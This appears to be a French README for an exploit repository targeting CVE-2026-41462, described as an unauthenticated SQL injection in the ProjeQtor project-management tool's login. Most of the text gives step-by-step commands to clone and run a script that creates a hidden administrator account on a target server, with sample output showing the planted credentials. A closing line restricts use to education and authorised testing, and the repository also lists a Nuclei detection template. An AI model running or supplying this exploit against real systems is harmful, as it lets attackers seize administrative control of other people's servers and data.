
CVE-2026-41462
Injection SQL non authentifiée critique dans ProjeQtor ≤ 12.4.3
CVE-2026-41462 est une vulnérabilité critique d'injection SQL non authentifiée dans la fonctionnalité de connexion de l'outil de gestion de projet ProjeQtor.
python3 CVE-2026-41462.py -u http://target.com --create-admin
# With custom credentials
python3 CVE-2026-41462.py -u http://target.com --create-admin \
--username admin123 --password StrongPass2026!
Lorsque l'exploit réussit, vous verrez une sortie similaire à ceci :
[+] Targeting: http://target.com
[+] Sending payload to create admin user 'hacker' ...
[+] Request sent successfully.
[+] New admin created → Username: hacker | Password: Admin123!
[+] Try logging in at: http://target.com/login.php
Ouvrez votre navigateur et allez sur :
http://target.com/login.php
Connectez-vous avec les identifiants affichés dans la sortie du script.
Si la connexion réussit, vous arriverez sur le tableau de bord administrateur ProjeQtor avec tous les privilèges administratifs.
Indicateurs de succès :
| Fichier | Description |
|---|---|
CVE-2026-41462.py | Script d'exploitation principal |
CVE-2026-41462.yaml | Modèle de détection Nuclei |
README.md | Cette documentation |
Clonez le dépôt :
git clone https://github.com/0xBlackash/CVE-2026-41462.git
cd CVE-2026-41462
Exécutez l'exploit :
python3 CVE-2026-41462.py -u http://target.com --create-admin
Connectez-vous avec le compte administrateur nouvellement créé.
Cet outil est destiné uniquement à des fins éducatives et à des tests d'intrusion autorisés. Toute utilisation non autorisée est illégale.